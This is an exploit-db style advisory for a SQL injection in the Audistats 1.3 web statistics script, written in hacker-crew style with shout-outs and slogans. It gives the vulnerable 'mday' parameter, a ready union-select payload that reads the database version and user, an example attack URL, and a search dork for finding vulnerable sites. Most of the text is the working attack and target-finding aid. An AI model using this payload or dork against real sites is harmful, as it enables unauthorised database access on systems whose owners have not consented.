Audistats 1.3 – SQL Injection

  • 作者: kaMtiEz
    日期: 2010-02-05
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11334/
  • ###################################################################################
    #
    [~] Audistats SQL injection vulnerability - (mday)# 
    [~] Author	: kaMtiEz (kamzcrew@yahoo.com)#
    [~] Homepage	: http://www.indonesiancoder.com#
    [~] Date	: January 29, 2010#
    #
    ###################################################################################
    
    [ Software Information ]
    
    [+] Vendor : http://adubus.free.fr/audistat/
    [+] Download : http://adubus.free.fr/audistat/
    [+] version : 1.3 or lower maybe also affected
    [+] Vulnerability : SQL injection
    [+] Dork : "Think iT"
    [+] Price : -
    [+] Location : INDONESIA - JOGJA
    
    ##################################################################################
    
    
    [ HERE WE GO .. LIVE FROM JOGJA CITY ]
    
    [ Vulnerable File ]
    
    http://127.0.0.1/[kaMtiEz]/?year=kaMtiEz&month=tukulesto&mday=[INDONESIANCODER]
    
    [ Exploit ]
    
    -666+union+all+select+@@version,user()--
    
    [ Example ]
    
    http://[server]/stats/?year=kaMtiEz&month=tukulesto&mday=-15+union+all+select+@@version,user()--
    
    ===========================================================================
    
    [ Thx TO ]
    
    [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
    [+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
    [+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13Z
    [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk,r3m1ck
    
    [ NOTE ] 
    
    [+] Belajar Belajar Dan Belajar !!
    [+] Jack im commiinnggggggggggggggggggggggggggggggggg .. ^_^
    
    [ QUOTE ]
    
    [+] we are not dead INDONESIANCODER stil r0x
    [+] nothing secure ..